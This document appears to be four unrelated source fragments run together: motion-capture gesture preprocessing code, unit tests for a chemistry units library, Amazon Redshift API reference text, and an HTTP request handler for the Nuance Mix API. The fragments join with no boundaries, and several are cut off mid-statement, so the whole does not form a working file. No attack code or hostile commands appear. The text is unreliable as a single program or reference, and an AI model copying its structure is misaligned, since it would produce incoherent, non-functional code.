modif = [15,16,17,18]
if R == 4:#left leg
modif = [19,20,21,22]
for f in range(F):
for j in modif:
for q in range(1,4):
result[s][f][j][q]=-result[s][f][j][q]
if oddity == 'static':
for s in range(S):
R = random.randint(0,4)
if R == 0:#spines
modif = [0,1,2,3,4,5]
if R == 1:#right arm
modif = [6,8,9,10]
if R == 2:#left arm
modif = [11,12,13,14]
if R == 3:#right leg
modif = [15,16,17,18]
if R == 4:#left leg
modif = [19,20,21,22]
for f in range(F):
for j in modif:
for q in range(4):
result[s][f][j][q]=0.0000001
return result
def rotations_preprocess(rotations_batch, epsilon):
"""take an np.array of rotations and replace the zeros (that can cause problems with Quaternions) by a very low value.
This is suppose to avoid errors when feeding the generated postures to the generator"""
S = rotations_batch.shape[0] # number of elements in the data set
F = rotations_batch.shape[1] # number of frame per element
J = rotations_batch.shape[2] # number of joint per frame
result = rotations_batch
for s in range(S):
for f in range(F):
for j in range(J):
for i in range(4):
if abs(result[s][f][j][i]) <= epsilon :
result[s][f][j][i] = epsilon
return result
def motion_postprocess(motion):
"""put a the generated gesture in the same orientation before displaying it"""
F = motion.shape[0] # number of elements in the data set
J = motion.shape[1] # number of frame per element
result = motion.copy()
for f in range(0,F):
result[f][0] = np.array([0.9987335, -0.05031297, 0.00000001, 0.00000001])
return result
def prepare_data(directory, duration, framerate, shift):
"""prepare the data to be feed in the network
directory : name of the folder containing the motion_data. directory should be in the same folder as the algorithm.string
duration : duration (seconds) we want the data elements to be. float
framerate : fps we want the data to be. float
shift : when getting multiple samples from a file, indicate the time in between (if shift < duration : overlaping)
Every elements in the data is given a same duration and framerate"""
#Getting all the paths to the bvh files of the directory
print("loading bvh file ...", end="\r")
bvh_paths = []
current_dir = os.getcwd()
motion_dir = os.path.join(current_dir, directory)
for each in os.listdir(motion_dir):
bvh_paths.append(os.path.join(motion_dir, each))
#Loading the bvh files and save them as file of a smaller duration
motion_data = []
for i in bvh_paths :
if not(i==DIR+'motionDataSet_bvhFormat/.ipynb_checkpoints'): #some issues with a non existing file
try:
new_data = BVH.load(filename=i)
motion_data.append(new_data) #avoid loading the same file twice
except ValueError :
print ("on line",i)
print("loading bvh files : DONE",end="\r")
#Changing the animations' framerate by sampling the rotations and positions of the files
lowFPS_data = []
for m in motion_data :
file_duration = m[0].rotations.shape[0]*m[2] #duration of the file (s)
frame_skip = int(framerate/m[2]) #number of frames to skip to get the wanted framerate
end_frame = int(duration/m[2]) #frame to end one sample
#we need to count how many samples we can extract from a single file to proceed with the multi-sampling
nb_samples = 0
r = 0
while r + duration < file_duration:
nb_samples += 1
r += shift
if(nb_samples > 0):
for sample in range(nb_samples):
rots = []
poss = []
for k in range(sample*(shift*int(1/m[2])), sample*(shift*int(1/m[2]))+end_frame, frame_skip) :
rots.append(m[0].rotations[k])
poss.append(m[0].positions[k])
new_rotations = Quaternions(np.array(rots))
new_positions = np.array(poss)
new_positions = np.array([[[0]*3]*23]*36)
if new_rotations.shape == (36, 23):
new_anim = Animation.Animation(new_rotations, new_positions, m[0].orients, m[0].offsets, m[0].parents)
lowFPS_tuple = (new_anim, m[1], framerate)
lowFPS_data.append(lowFPS_tuple)
print("lowering framerate : DONE", end="\r")
return np.array(lowFPS_data)
#preparing data of 3-second-long animations at 12 fps ; this step can take a few minutes depending on the dataset size
lowFPS_data = prepare_data('motionDataSet_bvhFormat', DURATION, FRAMERATE, 1)
print(f"lowFPS_{RUN_ID}_{DURATION}s_{1/FRAMERATE}fps")
print("preparing low_fps_data : DONE",end="\r")
#saving lowFPS data in directory
for i in range (len(lowFPS_data)) :
BVH.save(filename=DIR+"lowFPS_"+str(RUN_ID)+"_"+str(DURATION)+"s_"+str(1/FRAMERATE)+"fps/data_LFPS_"+str(i)+".bvh",
anim=lowFPS_data[i][0],
names=lowFPS_data[i][1],
frametime=lowFPS_data[i][2]
)
#extracting the rotations from the lowFPS_data
print("extracting rotations ...",end="\r")
rots = []
for i in lowFPS_data :
insert = np.array(i[0].rotations)
rots.append(insert)
rots.append(mirror_rotations(insert)) # add the mirrored rotations to get more data
rots_data
try:
q = quantity.HeatCapacity(1.0,"kJ/K")
self.fail('Allowed invalid unit type "kJ/K".')
except quantity.QuantityError:
pass
def test_kJpermolperK(self):
"""
Test the creation of a heat capacity quantity with units of kJ/(mol*K).
"""
q = quantity.HeatCapacity(1.0,"kJ/(mol*K)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1000., delta=1e-6)
self.assertEqual(q.units, "kJ/(mol*K)")
def test_kcalperK(self):
"""
Test the creation of a heat capacity quantity with units of kcal/K.
"""
try:
q = quantity.HeatCapacity(1.0,"kcal/K")
self.fail('Allowed invalid unit type "kcal/K".')
except quantity.QuantityError:
pass
def test_kcalpermolperK(self):
"""
Test the creation of a heat capacity quantity with units of kcal/(mol*K).
"""
q = quantity.HeatCapacity(1.0,"kcal/(mol*K)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 4184., delta=1e-6)
self.assertEqual(q.units, "kcal/(mol*K)")
################################################################################
class TestInertia(unittest.TestCase):
"""
Contains unit tests of the Inertia unit type object.
"""
def test_kg_m2(self):
"""
Test the creation of a moment of inertia quantity with units of kg*m^2.
"""
q = quantity.Inertia(1.0,"kg*m^2")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "kg*m^2")
def test_amu_angstrom2(self):
"""
Test the creation of a moment of inertia quantity with units of amu*angstrom^2.
"""
q = quantity.Inertia(1.0,"amu*angstrom^2")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*constants.Na*1e23, 1.0, delta=1e-6)
self.assertEqual(q.units, "amu*angstrom^2")
################################################################################
class TestLength(unittest.TestCase):
"""
Contains unit tests of the Length unit type object.
"""
def test_m(self):
"""
Test the creation of a length quantity with units of m.
"""
q = quantity.Length(1.0,"m")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "m")
def test_km(self):
"""
Test the creation of a length quantity with units of km.
"""
q = quantity.Length(1.0,"km")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e3, delta=1e-3)
self.assertEqual(q.units, "km")
def test_cm(self):
"""
Test the creation of a length quantity with units of cm.
"""
q = quantity.Length(1.0,"cm")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-2, delta=1e-8)
self.assertEqual(q.units, "cm")
def test_mm(self):
"""
Test the creation of a length quantity with units of mm.
"""
q = quantity.Length(1.0,"mm")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-3, delta=1e-9)
self.assertEqual(q.units, "mm")
def test_um(self):
"""
Test the creation of a length quantity with units of um.
"""
q = quantity.Length(1.0,"um")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-6, delta=1e-12)
self.assertEqual(q.units, "um")
def test_nm(self):
"""
Test the creation of a length quantity with units of nm.
"""
q = quantity.Length(1.0,"nm")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-9, delta=1e-15)
self.assertEqual(q.units, "nm")
def test_pm(self):
"""
Test the creation of a length quantity with units of pm.
"""
q = quantity.Length(1.0,"pm")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-12, delta=1e-18)
self.assertEqual(q.units, "pm")
################################################################################
class TestMass(unittest.TestCase):
"""
Contains unit tests of the Mass unit type object.
Note that value_si is always kg (per molecule), not kg/mol.
"""
def test_kg(self):
"""
Test the creation of a mass quantity with units of kg.
"""
q = quantity.Mass(1.0,"kg")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "kg")
def test_gpermol(self):
"""
Test the creation of a mass quantity with units of g/mol.
Note that g/mol is automatically coerced to amu.
"""
q = quantity.Mass(1.0,"g/mol")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, constants.amu, delta=1e-32)
self.assertEqual(q.units, "amu")
def test_kgpermol(self):
"""
Test the creation of a mass quantity with units of kg/mol.
Note that kg/mol is automatically coerced to amu.
"""
q = quantity.Mass(1.0,"kg/mol")
self.assertAlmostEqual(q.value, 1000.0, 3)
self.assertAlmostEqual(q.value_si, 1000.*constants.amu, delta=1e-29)
self.assertEqual(q.units, "amu")
def test_amu(self):
"""
Test the creation of a mass quantity with units of amu.
"""
q = quantity.Mass(1.0,"amu")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, constants.amu, delta=1e-32)
self.assertEqual(q.units, "amu")
################################################################################
class TestMomentum(unittest.TestCase):
"""
Contains unit tests of the Momentum unit type object.
"""
def test_kgmpers2(self):
"""
Test the creation of a momentum quantity with units of kg*m/s^2.
"""
q = quantity.Momentum(1.0,"kg*m/s^2")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "kg*m/s^2")
################################################################################
class TestPower(unittest.TestCase):
"""
Contains unit tests of the Power unit type object.
"""
def test_W(self):
"""
Test the creation of a power quantity with units of W.
"""
q = quantity.Power(1.0,"W")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "W")
################################################################################
class TestPressure(unittest.TestCase):
"""
Contains unit tests of the Pressure unit type object.
"""
def test_Pa(self):
"""
Test the creation of a pressure quantity with units of Pa.
"""
q = quantity.Pressure(1.0,"Pa")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "Pa")
def test_bar(self):
"""
Test the creation of a pressure quantity with units of bar.
"""
q = quantity.Pressure(1.0,"bar")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e5, delta=1e-6)
self.assertEqual(q.units, "bar")
def test_atm(self):
"""
Test the creation of a pressure quantity with units of atm.
"""
q = quantity.Pressure(1.0,"atm")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 101325., delta=1e-6)
self.assertEqual(q.units, "atm")
def test_torr(self):
"""
Test the creation of a pressure quantity with units of torr.
"""
q = quantity.Pressure(1.0,"torr")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 101325./760., delta=1e-6)
self.assertEqual(q.units, "torr")
def test_psi(self):
"""
Test the creation of a pressure quantity with units of psi.
"""
q = quantity.Pressure(1.0,"psi")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 101325./14.695949, delta=1e-2)
self.assertEqual(q.units, "psi")
################################################################################
class TestRateCoefficient(unittest.TestCase):
"""
Contains unit tests of the RateCoefficient unit type object.
"""
def test_s(self):
"""
Test the creation of a rate coefficient quantity with units of s^-1.
"""
q = quantity.RateCoefficient(1.0,"s^-1")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "s^-1")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1.0, places=1) # 1 /s = 1 /s
def test_m3permols(self):
"""
Test the creation of a rate coefficient quantity with units of m^3/(mol*s).
"""
q = quantity.RateCoefficient(1.0,"m^3/(mol*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "m^3/(mol*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e6, places=1) # 1 m3/mol/s = 1e6 cm3/mol/s
def test_m6permol2s(self):
"""
Test the creation of a rate coefficient quantity with units of m^6/(mol^2*s).
"""
q = quantity.RateCoefficient(1.0,"m^6/(mol^2*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "m^6/(mol^2*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e12, places=1) # 1 m6/mol2/s = 1e12 cm6/mol2/s
def test_m9permol3s(self):
"""
Test the creation of a rate coefficient quantity with units of m^9/(mol^3*s).
"""
q = quantity.RateCoefficient(1.0,"m^9/(mol^3*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "m^9/(mol^3*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e18, delta=1e3) # 1 m9/mol3/s = 1e18 cm9/mol3/s
def test_cm3permols(self):
"""
Test the creation of a rate coefficient quantity with units of cm^3/(mol*s).
"""
q = quantity.RateCoefficient(1.0,"cm^3/(mol*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*1e6, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^3/(mol*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e6, places=1) # 1 m3/mol/s = 1e6 cm3/mol/s
def test_cm6permol2s(self):
"""
Test the creation of a rate coefficient quantity with units of cm^6/(mol^2*s).
"""
q = quantity.RateCoefficient(1.0,"cm^6/(mol^2*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*(1e6)**2, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^6/(mol^2*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e12, places=1) # 1 m6/mol2/s = 1e12 cm6/mol2/s
def test_cm9permol3s(self):
"""
Test the creation of a rate coefficient quantity with units of cm^9/(mol^3*s).
"""
q = quantity.RateCoefficient(1.0,"cm^9/(mol^3*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*(1e6)**3, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^9/(mol^3*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e18, delta=1e3) # 1 m9/mol3/s = 1e18 cm9/mol3/s
def test_cm3permolecules(self):
"""
Test the creation of a rate coefficient quantity with units of cm^3/(molecule*s).
"""
q = quantity.RateCoefficient(1.0,"cm^3/(molecule*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*1e6/constants.Na, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^3/(molecule*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e6, delta=1e0) # 1 m3/mol/s = 1e6 cm3/mol/s
def test_cm6permolecule2s(self):
"""
Test the creation of a rate coefficient quantity with units of cm^6/(molecule^2*s).
"""
q = quantity.RateCoefficient(1.0,"cm^6/(molecule^2*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*(1e6/constants.Na)**2, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^6/(molecule^2*s)")
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e12 , delta=1e0) # 1 m6/mol2/s = 1e12 cm6/mol2/s
def test_cm9permolecule3s(self):
"""
Test the creation of a rate coefficient quantity with units of cm^9/(molecule^3*s).
"""
q = quantity.RateCoefficient(1.0,"cm^9/(molecule^3*s)")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si*(1e6/constants.Na)**3, 1.0, delta=1e-6)
self.assertEqual(q.units, "cm^9/(molecule^3*s)")
print(q.units)
self.assertAlmostEqual(q.getConversionFactorFromSItoCmMolS(), 1e18 , delta=1e3) # 1 m9/mol3/s = 1e18 cm9/mol3/s
################################################################################
class TestTemperature(unittest.TestCase):
"""
Contains unit tests of the Temperature unit type object.
"""
def test_K(self):
"""
Test the creation of a temperature quantity with units of K.
"""
q = quantity.Temperature(1.0,"K")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "K")
def test_degC(self):
"""
Test the creation of a temperature quantity with units of degrees C.
"""
with self.assertRaises(NotImplementedError):
q = quantity.Temperature(1.0,"degC")
def test_degF(self):
"""
Test the creation of a temperature quantity with units of degrees F.
"""
with self.assertRaises(NotImplementedError):
q = quantity.Temperature(1.0,"degF")
def test_degR(self):
"""
Test the creation of a temperature quantity with units of degrees R.
"""
with self.assertRaises(NotImplementedError):
q = quantity.Temperature(1.0,"degR")
################################################################################
class TestTime(unittest.TestCase):
"""
Contains unit tests of the Time unit type object.
"""
def test_s(self):
"""
Test the creation of a time quantity with units of s.
"""
q = quantity.Time(1.0,"s")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0, delta=1e-6)
self.assertEqual(q.units, "s")
def test_ms(self):
"""
Test the creation of a time quantity with units of ms.
"""
q = quantity.Time(1.0,"ms")
self.assertAlmostEqual(q.value, 1.0, 6)
self.assertAlmostEqual(q.value_si, 1.0e-3, delta=1e-9)
self.assertEqual(q.units, "ms")
def test_us(self):
"""
Test the creation of a time quantity | |
KMS and None. For the China region the possible values are None, and Legacy.
- **ClusterVersion** *(string) --*
The version ID of the Amazon Redshift engine that is running on the cluster.
- **AllowVersionUpgrade** *(boolean) --*
A boolean value that, if ``true`` , indicates that major version upgrades will be applied automatically to the cluster during the maintenance window.
- **NumberOfNodes** *(integer) --*
The number of compute nodes in the cluster.
- **PubliclyAccessible** *(boolean) --*
A boolean value that, if ``true`` , indicates that the cluster can be accessed from a public network.
- **Encrypted** *(boolean) --*
A boolean value that, if ``true`` , indicates that data in the cluster is encrypted at rest.
- **RestoreStatus** *(dict) --*
A value that describes the status of a cluster restore action. This parameter returns null if the cluster was not created by restoring a snapshot.
- **Status** *(string) --*
The status of the restore action. Returns starting, restoring, completed, or failed.
- **CurrentRestoreRateInMegaBytesPerSecond** *(float) --*
The number of megabytes per second being transferred from the backup storage. Returns the average rate for a completed backup.
- **SnapshotSizeInMegaBytes** *(integer) --*
The size of the set of snapshot data used to restore the cluster.
- **ProgressInMegaBytes** *(integer) --*
The number of megabytes that have been transferred from snapshot storage.
- **ElapsedTimeInSeconds** *(integer) --*
The amount of time an in-progress restore has been running, or the amount of time it took a completed restore to finish.
- **EstimatedTimeToCompletionInSeconds** *(integer) --*
The estimate of the time remaining before the restore will complete. Returns 0 for a completed restore.
- **DataTransferProgress** *(dict) --*
- **Status** *(string) --*
Describes the status of the cluster. While the transfer is in progress the status is ``transferringdata`` .
- **CurrentRateInMegaBytesPerSecond** *(float) --*
Describes the data transfer rate in MB's per second.
- **TotalDataInMegaBytes** *(integer) --*
Describes the total amount of data to be transferred in megabytes.
- **DataTransferredInMegaBytes** *(integer) --*
Describes the total amount of data that has been transferred in MB's.
- **EstimatedTimeToCompletionInSeconds** *(integer) --*
Describes the estimated number of seconds remaining to complete the transfer.
- **ElapsedTimeInSeconds** *(integer) --*
Describes the number of seconds that have elapsed during the data transfer.
- **HsmStatus** *(dict) --*
A value that reports whether the Amazon Redshift cluster has finished applying any hardware security module (HSM) settings changes specified in a modify cluster command.
Values: active, applying
- **HsmClientCertificateIdentifier** *(string) --*
Specifies the name of the HSM client certificate the Amazon Redshift cluster uses to retrieve the data encryption keys stored in an HSM.
- **HsmConfigurationIdentifier** *(string) --*
Specifies the name of the HSM configuration that contains the information the Amazon Redshift cluster can use to retrieve and store keys in an HSM.
- **Status** *(string) --*
Reports whether the Amazon Redshift cluster has finished applying any HSM settings changes specified in a modify cluster command.
Values: active, applying
- **ClusterSnapshotCopyStatus** *(dict) --*
A value that returns the destination region and retention period that are configured for cross-region snapshot copy.
- **DestinationRegion** *(string) --*
The destination region that snapshots are automatically copied to when cross-region snapshot copy is enabled.
- **RetentionPeriod** *(integer) --*
The number of days that automated snapshots are retained in the destination region after they are copied from a source region.
- **ManualSnapshotRetentionPeriod** *(integer) --*
The number of days that automated snapshots are retained in the destination region after they are copied from a source region. If the value is -1, the manual snapshot is retained indefinitely.
The value must be either -1 or an integer between 1 and 3,653.
- **SnapshotCopyGrantName** *(string) --*
The name of the snapshot copy grant.
- **ClusterPublicKey** *(string) --*
The public key for the cluster.
- **ClusterNodes** *(list) --*
The nodes in the cluster.
- *(dict) --*
The identifier of a node in a cluster.
- **NodeRole** *(string) --*
Whether the node is a leader node or a compute node.
- **PrivateIPAddress** *(string) --*
The private IP address of a node within a cluster.
- **PublicIPAddress** *(string) --*
The public IP address of a node within a cluster.
- **ElasticIpStatus** *(dict) --*
The status of the elastic IP (EIP) address.
- **ElasticIp** *(string) --*
The elastic IP (EIP) address for the cluster.
- **Status** *(string) --*
The status of the elastic IP (EIP) address.
- **ClusterRevisionNumber** *(string) --*
The specific revision number of the database in the cluster.
- **Tags** *(list) --*
The list of tags for the cluster.
- *(dict) --*
A tag consisting of a name/value pair for a resource.
- **Key** *(string) --*
The key, or name, for the resource tag.
- **Value** *(string) --*
The value for the resource tag.
- **KmsKeyId** *(string) --*
The AWS Key Management Service (AWS KMS) key ID of the encryption key used to encrypt data in the cluster.
- **EnhancedVpcRouting** *(boolean) --*
An option that specifies whether to create the cluster with enhanced VPC routing enabled. To create a cluster that uses enhanced VPC routing, the cluster must be in a VPC. For more information, see `Enhanced VPC Routing <https://docs.aws.amazon.com/redshift/latest/mgmt/enhanced-vpc-routing.html>`__ in the Amazon Redshift Cluster Management Guide.
If this option is ``true`` , enhanced VPC routing is enabled.
Default: false
- **IamRoles** *(list) --*
A list of AWS Identity and Access Management (IAM) roles that can be used by the cluster to access other AWS services.
- *(dict) --*
An AWS Identity and Access Management (IAM) role that can be used by the associated Amazon Redshift cluster to access other AWS services.
- **IamRoleArn** *(string) --*
The Amazon Resource Name (ARN) of the IAM role, for example, ``arn:aws:iam::123456789012:role/RedshiftCopyUnload`` .
- **ApplyStatus** *(string) --*
A value that describes the status of the IAM role's association with an Amazon Redshift cluster.
The following are possible statuses and descriptions.
* ``in-sync`` : The role is available for use by the cluster.
* ``adding`` : The role is in the process of being associated with the cluster.
* ``removing`` : The role is in the process of being disassociated with the cluster.
- **PendingActions** *(list) --*
Cluster operations that are waiting to be started.
- *(string) --*
- **MaintenanceTrackName** *(string) --*
The name of the maintenance track for the cluster.
- **ElasticResizeNumberOfNodeOptions** *(string) --*
The number of nodes that you can resize the cluster to with the elastic resize method.
- **DeferredMaintenanceWindows** *(list) --*
Describes a group of ``DeferredMaintenanceWindow`` objects.
- *(dict) --*
Describes a deferred maintenance window
- **DeferMaintenanceIdentifier** *(string) --*
A unique identifier for the maintenance window.
- **DeferMaintenanceStartTime** *(datetime) --*
A timestamp for the beginning of the time period when we defer maintenance.
- **DeferMaintenanceEndTime** *(datetime) --*
A timestamp for the end of the time period when we defer maintenance.
- **SnapshotScheduleIdentifier** *(string) --*
A unique identifier for the cluster snapshot schedule.
- **SnapshotScheduleState** *(string) --*
The current state of the cluster snapshot schedule.
- **ResizeInfo** *(dict) --*
Returns the following:
* AllowCancelResize: a boolean value indicating if the resize operation can be cancelled.
* ResizeType: Returns ClassicResize
- **ResizeType** *(string) --*
Returns the value ``ClassicResize`` .
- **AllowCancelResize** *(boolean) --*
A boolean value indicating if the resize operation can be cancelled.
:type ClusterIdentifier: string
:param ClusterIdentifier: **[REQUIRED]**
The unique identifier of the cluster for which you want to associate or disassociate IAM roles.
:type AddIamRoles: list
:param AddIamRoles:
Zero or more IAM roles to associate with the cluster.
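Example request (a hedged sketch, assuming this documents the ``modify_cluster_iam_roles`` operation; the cluster identifier and role ARN below are placeholders)::
    response = client.modify_cluster_iam_roles(
        ClusterIdentifier='examplecluster',
        AddIamRoles=['arn:aws:iam::123456789012:role/RedshiftCopyUnload']
    )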
"""
Classes on handling HTTP requests towards Mix API endpoints
"""
from abc import ABCMeta, abstractmethod
import copy
import json
from typing import Optional, Union, List, Dict, Callable, Any, Tuple
import requests
import re
from io import BytesIO
from requests import Response
from .logging import Loggable
from .auth import MixApiAuthToken, MixApiAuthHandler, MixApiAuthTokenExpirationError
from . import truncate_long_str
DEFAULT_API_HOST = 'https://mix.nuance.com'
DEFAULT_API_PATH_PREFIX = '/v3'
URL_PATH_SEP = '/'
"""Default Mix production server for API requests"""
GET_METHOD = "GET"
POST_METHOD = "POST"
DELETE_METHOD = "DELETE"
PUT_METHOD = 'PUT'
SUPPORTED_HTTP_METHODS = {GET_METHOD, POST_METHOD, DELETE_METHOD, PUT_METHOD}
DEFAULT_API_REQUEST_HEADERS = {'accept': 'application/json', 'Connection': 'keep-alive',
'Authorization': 'Bearer {token}'}
_PTN_HEADER_VALUE_AUTH_TOKEN = re.compile(r'^Bearer\s+')
API_RESP_DATA_FIELD = 'data'
# typing hint alias
RequestResult = Union[bool, str, int, bytes, Dict, Response]
def get_api_resp_payload_data(payload_json: Dict, reduce_list: bool = True) -> Optional[Union[Dict, List]]:
"""
Get the 'data' field from API response payload
:param payload_json:
:param reduce_list: Reduce the list from data field if there is only one element
:return:
"""
if API_RESP_DATA_FIELD not in payload_json:
return payload_json
payload_json_data: Union[Dict, str] = payload_json[API_RESP_DATA_FIELD]
if isinstance(payload_json_data, list):
if not payload_json_data:
return None
if len(payload_json_data) > 1:
return payload_json_data
if reduce_list:
return payload_json_data[0]
else:
return payload_json_data
else:
return payload_json_data
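# Illustrative behaviour of get_api_resp_payload_data (the example payloads are made up):
# get_api_resp_payload_data({'data': [{'id': 1}]}) -> {'id': 1} (single-element 'data' list is reduced)
# get_api_resp_payload_data({'data': [{'id': 1}, {'id': 2}]}) -> the full two-element list
# get_api_resp_payload_data({'id': 1}) -> {'id': 1} (no 'data' field, payload returned as-is)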
def proc_headers_token_for_log(headers: Optional[Dict[str, Union[str, Any]]],
no_token: Optional[bool] = True) -> str:
"""
Produce a representative string on HTTP headers, optionally removing the auth token
:param headers: HTTP headers
:param no_token: whether or not the token should be removed from the Authorization header
:return: A representative string for display purposes
"""
if not headers:
return '{}'
headers_repr = dict()
for k, v in headers.items():
if no_token and k == 'Authorization' \
and isinstance(v, str) and _PTN_HEADER_VALUE_AUTH_TOKEN.search(v):
headers_repr[k] = 'Bearer ...'
else:
headers_repr[k] = v
return json.dumps(headers_repr)
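# Example (hypothetical header values): with no_token=True,
# proc_headers_token_for_log({'accept': 'application/json', 'Authorization': 'Bearer abc123'})
# returns '{"accept": "application/json", "Authorization": "Bearer ..."}'.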
# noinspection PyUnusedLocal
def default_token_expire_action(auth_token: Optional[MixApiAuthToken] = None):
"""
Default action when the Mix auth token is found to have expired
:return: None
"""
raise MixApiAuthTokenExpirationError("Mix auth token has expired")
def chk_err_in_payload(json_payload, exc: bool = True):
"""
Check if there are error(s) indicated in response.
:param json_payload:
:param exc: Should raise exception if error found.
"""
err_fields = {'error', 'errors'}
for errf in err_fields:
if errf in json_payload and json_payload[errf]:
if exc:
raise RuntimeError(f'Response marked with {errf}: {json.dumps(json_payload[errf])}')
else:
return True
def validate_mix_resp_error(mix_json_resp: Dict):
"""
Check Mix response with preset error field presences
:param mix_json_resp: Json object of Mix response on API requests
:return: None
"""
chk_err_in_payload(mix_json_resp)
def validate_resp_json_payload(resp_payload: Union[str, Dict],
token_exp_action: Optional[Callable] = None, check_err: bool = True) -> Dict:
"""
Validate HTTP response payload
:param check_err:
:param resp_payload: HTTP response payload, either a literal string of Json or Json object
:param token_exp_action: A function which would be called when auth token is found expired
:return: A Json object
"""
if not resp_payload:
# CURL does not return anything
return json.loads('{}')
try:
if isinstance(resp_payload, str):
json_result = json.loads(resp_payload)
else:
json_result = resp_payload
except Exception as ex:
raise RuntimeError(f"HTTP requests succeeded but returned invalid JSON: {resp_payload}") from ex
orig_json_result = json_result
if 'status' in json_result and json_result['status'] == 'error':
raise RuntimeError(f"Error detected fro request: {resp_payload}")
if check_err:
chk_err_in_payload(json_result)
if 'data' in json_result and json_result['data']:
json_result = json_result['data']
if isinstance(json_result, list):
json_result = json_result[0]
if 'error' in json_result:
if 'status' in json_result['error'] and json_result['error']['status'].lower() == 'unauthorized':
# we know the token has expired
if not token_exp_action:
token_exp_action = default_token_expire_action
token_exp_action()
elif check_err:
chk_err_in_payload(json_result)
elif 'response' in json_result:
validate_mix_resp_error(json_result['response'])
elif check_err:
chk_err_in_payload(json_result)
else:
...
return orig_json_result
class HTTPRequestHandler(Loggable, metaclass=ABCMeta):
"""
Abstract class on handlers for HTTP Requests used in MixCli
"""
def __init__(self, auth_handler: MixApiAuthHandler, name: Optional[str] = None,
log_level: Optional[Union[int, str]] = None, no_token_log: bool = True):
"""
Constructor
:param auth_handler: A MixApiAuthHandler instance from which auth tokens can be requested
:param name: Name of the specific HTTPRequestHandler instance used in logging
:param log_level: Default logging level for the instance
:param no_token_log: Specification on whether or not auth tokens should be removed from logging
"""
self._auth_hdlr = auth_handler
if name:
Loggable.__init__(self, bearer=name, log_level=log_level)
else:
Loggable.__init__(self, bearer=self, log_level=log_level)
self._no_token_log = no_token_log
@property
def name(self):
return 'HTTPReqHdlr'
@property
def no_token_log(self) -> bool:
return self._no_token_log
@no_token_log.setter
def no_token_log(self, new_val: bool):
self._no_token_log = new_val
def get_default_headers(self, auth_token: Optional[str] = None) -> Dict:
"""
Get the default headers for Mix3 API calls.
:return: Json object of default headers to run Curl for Mix API endpoints
"""
headers_copy = copy.copy(DEFAULT_API_REQUEST_HEADERS)
if not auth_token:
self.debug('requesting token from auth handler')
auth_token = self._auth_hdlr.token
headers_copy['Authorization'] = (headers_copy['Authorization']).format(token=auth_token)
